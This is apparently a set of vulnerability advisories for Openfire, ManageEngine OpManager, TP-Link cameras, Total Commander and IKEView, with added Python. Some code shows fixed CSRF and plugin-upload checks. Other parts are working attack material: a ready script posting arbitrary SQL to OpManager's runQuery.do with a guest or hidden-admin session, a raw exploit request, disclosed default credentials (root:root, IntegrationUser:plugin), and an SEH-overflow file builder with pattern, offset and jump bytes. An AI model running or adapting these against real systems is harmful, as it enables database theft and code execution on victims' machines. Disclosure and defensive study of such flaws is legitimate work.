This module exploits a vulnerability in Windows Media Center. By supplying a UNC path in the *.mcl file, a remote file is downloaded automatically, which can result in arbitrary code execution.
No CSRF tokens exist, allowing an attacker to take malicious actions against the application through the browser of a logged-in user: 1. change the admin password; 2. add arbitrary users to the system; 3. edit server settings, e.g. turn off SSL; 4. add rogue malicious clients with permit access ('Allow all XMPP clients to connect'); and more.
No check is made when updating user privileges, allowing a regular user to become an admin. The escalation can also be carried out remotely against a user who is logged in, since no CSRF token exists.
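The two Openfire issues above combine: the privilege-update handler neither verifies a CSRF token nor checks that the caller is an administrator. The following is an added illustration (not Openfire's code) of a handler written both ways, with an in-memory session and user table constructed for the example; the token is an HMAC of the session id under a hypothetical server secret, so a cross-site form cannot produce it.

```python
import hashlib
import hmac
import secrets

# Constructed state for the example: session id -> username, username -> role.
SESSIONS = {}
USERS = {"admin": "admin", "alice": "user"}
CSRF_SECRET = secrets.token_bytes(32)  # hypothetical per-deployment secret


def login(username):
    """Create a session for an existing user and return its id (the cookie value)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return sid


def csrf_token(session_id):
    """Token bound to one session; it must be echoed back in the form body."""
    return hmac.new(CSRF_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def update_privileges_vulnerable(session_id, target, role):
    """Mirrors the flaw described: any authenticated session may change any
    user's role, and a forged cross-site POST that rides on the victim's
    cookie is accepted because nothing beyond the cookie is checked."""
    if session_id not in SESSIONS:
        return "unauthenticated"
    USERS[target] = role
    return "ok"


def update_privileges_fixed(session_id, token, target, role):
    """Same operation with the two missing checks: a session-bound CSRF token
    compared in constant time, and an admin-only authorisation check."""
    caller = SESSIONS.get(session_id)
    if caller is None:
        return "unauthenticated"
    if token is None or not hmac.compare_digest(token, csrf_token(session_id)):
        return "csrf-rejected"
    if USERS.get(caller) != "admin":
        return "forbidden"
    USERS[target] = role
    return "ok"
```

A regular user's session is enough to make the vulnerable handler promote that user; against the fixed handler the same request fails first on the token and, once a genuine token is supplied, on the role check.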
In 'available-plugins.jsp' there is no validation of plugin downloads, allowing arbitrary files to be fetched from anywhere on the internet. On line 40, all that needs to be satisfied is that the parameter is not null; if that check passes, the application downloads whatever file URL it is given.
The application states that plugin files (.jar) can be uploaded directly using the form; however, the following can be uploaded as well: .exe, .php, .jsp, .py, .sh. To reproduce: choose a malicious file using the file browser and click 'upload plugin' at http://localhost:9090/plugin-admin.jsp. The uploaded file is stored under the /openfire/plugins directory.
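Both plugin paths above accept input on the strength of a presence check alone. As an added example (not Openfire's code), the validation a plugin-admin page would need is shown beside the null-only check the advisory describes: downloads are limited to HTTPS URLs on a hypothetical allow-list of plugin hosts ending in .jar, and uploads must carry a .jar name with no path components and actually be a zip archive containing a plugin.xml descriptor at its root, which is what an Openfire plugin jar carries. The sample jar is constructed in memory so the block runs offline.

```python
import io
import zipfile
from urllib.parse import urlparse

# Hypothetical allow-list; the page reports that the application has none.
TRUSTED_PLUGIN_HOSTS = {"plugins.example.org"}


def download_check_vulnerable(url):
    """The only condition the advisory reports on line 40: parameter is not null."""
    return url is not None


def download_check_fixed(url):
    """Require HTTPS, an allow-listed host and a .jar path before fetching."""
    if not url:
        return False
    parts = urlparse(url)
    if parts.scheme != "https" or parts.hostname not in TRUSTED_PLUGIN_HOSTS:
        return False
    return parts.path.lower().endswith(".jar")


def upload_check_fixed(filename, data):
    """Accept only a .jar that is a valid zip with plugin.xml at its root.
    Rejects .jsp/.php/.exe uploads and renamed non-archives, and refuses
    names that could steer the file outside the plugins directory."""
    if not filename.lower().endswith(".jar"):
        return False
    if "/" in filename or "\\" in filename or ".." in filename:
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if zf.testzip() is not None:
                return False
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    return "plugin.xml" in names


def make_sample_plugin(with_descriptor=True):
    """Constructed test fixture: a minimal plugin jar built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        if with_descriptor:
            zf.writestr("plugin.xml", "<plugin/>")
        zf.writestr("lib/placeholder.txt", "constructed for the example")
    return buf.getvalue()
```

The extension check alone would still let a .jsp be uploaded as evil.jar and picked up by a later rename, so the archive and descriptor checks are what actually block the cases the advisory lists.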
The NC220 and NC200 use hard-coded credentials in their Linux distribution image. These credentials (root:root) are never exposed to the end user and cannot be changed through any normal operation of the camera.
Total Commander is vulnerable to an SEH overwrite. By supplying a specially crafted file to the Change Attributes feature, an attacker can overwrite the SEH handler and cause a crash.
ManageEngine OpManager ships with a default account 'IntegrationUser' with the password 'plugin'. This account is hidden from the user interface and never shows up in user management, and by default its password cannot be changed. The account is nevertheless assigned Administrator privileges, and logging in with it via the web interface is possible. Any account that has access to the web interface can also access the PostgreSQL database, so any such user can reach the data stored in it.
Every user has the ability to execute SQL queries through the "/event/runQuery.do" script, including the default "guest" user (the SQL query option is merely not visible in the web interface). Below is the POST request, executed as "guest":

    POST /event/runQuery.do HTTP/1.1
    Host: 192.168.2.116:8400
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Cookie: JSESSIONID=XXXXXXXXXX
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: XXX

    query=SELECT+*+FROM+EVENTLOG

This vulnerability allows an attacker to execute arbitrary SQL queries against the database, for example to dump the user database.
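The request above, reproduced as an added Python script that is not part of the original advisory. It takes an existing JSESSIONID (for instance one obtained by logging in as "guest", or as the hidden 'IntegrationUser' account described above; the login step itself is not shown on the page and is not scripted here), encodes the form body the same way the capture shows (spaces as '+', the '*' left literal), and POSTs it to /event/runQuery.do. Host, port and session id are command-line arguments; the request builder is separated from the sender so the encoding can be checked without a target.

```python
import http.client
from urllib.parse import urlencode


def build_runquery_request(query):
    """Return (path, headers, body) for the unauthorised-query POST.
    safe="*" keeps '*' literal, matching the captured body."""
    body = urlencode({"query": query}, safe="*")
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": str(len(body)),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    }
    return "/event/runQuery.do", headers, body


def run_query(host, port, jsessionid, query, timeout=10):
    """Send the query with a low-privileged session cookie; return (status, body).
    A 200 with result rows for a guest session confirms the missing check."""
    path, headers, body = build_runquery_request(query)
    headers["Cookie"] = "JSESSIONID=" + jsessionid
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("POST", path, body=body, headers=headers)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


if __name__ == "__main__":
    import sys

    if len(sys.argv) != 4:
        sys.exit("usage: runquery.py <host> <port> <JSESSIONID>")
    host, port, sid = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    status, text = run_query(host, port, sid, "SELECT * FROM EVENTLOG")
    print(status)
    print(text[:2000])
```

Only the body and headers are fixed by the capture; the response format is not described on the page, so the script prints the raw response rather than parsing it.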
IKEView.exe is vulnerable to a local stack-based buffer overflow when parsing a malicious (internet key exchange) ".elg" file. The overflow overwrites the nSEH and SEH pointers at 4448 bytes once IKEView parses the file, which may result in execution of arbitrary attacker-supplied code.
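The Total Commander and IKEView entries above both describe file-based SEH overwrites, and the IKEView one gives the offset (4448 bytes) at which nSEH/SEH are hit. As an added example, not taken from either advisory, the following Python reproduces how such an offset is established and then lays out a file of the junk | nSEH | SEH | payload shape. The cyclic pattern follows the Metasploit convention (every window is unique within the first 20280 bytes, more than enough here); the nSEH short jump and the SEH placeholder bytes are illustrative values only, since a usable pop/pop/ret address must be taken from the target process, and the internal structure of a real .elg file is not described on the page.

```python
import string


def cyclic_pattern(length):
    """Metasploit-style pattern: Aa0Aa1...; unique windows up to 20280 bytes."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(pattern, value):
    """Offset of the bytes seen in nSEH/SEH after the crash.
    `value` is either the 4 raw bytes or the 32-bit value a debugger shows
    (little-endian, as on x86). Returns -1 if not found."""
    if isinstance(value, int):
        value = value.to_bytes(4, "little")
    return pattern.find(value)


def build_seh_overflow(offset, nseh, seh, payload, total=None):
    """junk | nSEH | SEH | payload, optionally padded to a fixed file size."""
    if len(nseh) != 4 or len(seh) != 4:
        raise ValueError("nSEH and SEH must each be 4 bytes")
    buf = b"A" * offset + nseh + seh + payload
    if total is not None and len(buf) < total:
        buf += b"C" * (total - len(buf))
    return buf


def write_poc(path, offset=4448, size=5000):
    """Write a crash file for the reported offset with placeholder handler values."""
    nseh = b"\xeb\x06\x90\x90"  # short jmp +6 over the SEH record (illustrative)
    seh = b"\x41\x41\x41\x41"   # placeholder: replace with a pop/pop/ret address
    data = build_seh_overflow(offset, nseh, seh, b"\xcc" * 32, total=size)
    with open(path, "wb") as fh:
        fh.write(data)
    return len(data)


if __name__ == "__main__":
    # Stage 1: feed the pattern to the parser and read nSEH/SEH in the debugger.
    pattern = cyclic_pattern(5000)
    with open("pattern.elg", "wb") as fh:
        fh.write(pattern)
    # Stage 2: map the observed values back to offsets; 4448 is the page's figure.
    print(find_offset(pattern, pattern[4448:4452]))
    # Stage 3: emit the layout with the handler fields at that offset.
    print(write_poc("poc.elg"))
```

Checking the offset against both the next-SEH and the SEH slot (4448 and 4452) before building the file avoids the off-by-four mistakes that are common when the debugger reports only one of the two values.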